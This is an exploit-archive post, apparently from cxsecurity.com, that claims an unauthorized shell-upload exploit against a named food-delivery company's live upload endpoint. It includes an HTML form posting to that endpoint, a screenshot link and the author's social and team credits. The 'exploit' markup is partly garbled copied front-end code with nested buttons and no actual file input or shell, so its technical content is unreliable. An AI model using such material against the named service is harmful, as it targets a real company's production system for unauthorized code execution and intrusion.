YemekSepeti Unauthorized Shell Upload Exploit

2020.03.07
Gaddar (TR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Vulnerability Title : YemekSepeti Unauthorized Shell Upload Exploit - Discovered By Gaddar
Author : Gaddar
Team : SiyahBayrak
Payload : Step_VM.uploadFileFor(attachment)

Exploit;

<form method="POST" action="https://portakal.yemeksepeti.com/attachment/file-up.php" enctype="multipart/form-data" >
  <div ng-if="attachment.FileInformationList.length == 0" ng-init="fileInfo=attachment.FileInformationList[0]">
    <p class="text-center">
      <button class="btn-material btn-sm btn-upload mt-29" id="uploadButton_2" ng-click="Step_VM.uploadFileFor(attachment)">
        <button class="btn-material btn-sm btn-upload" id="uploadButton_0" ng-click="Step_VM.uploadFileFor(attachment)">
          Select File
        </button>
        <i class="fa fa-cloud-upload"></i>
        Submit
      </button>
    </p>
  </div>

ScreenShot; https://ibb.co/3B5ZRBR

My social accounts ;
Instagram.com/pt.php
Facebook.com/ptsec
Twitter.com/ptguvenlik
Youtube.com/c/gaddarsec

My Teammates : DeadLy-Warrior - StabilBey - Diablo



Copyright 2024, cxsecurity.com

 
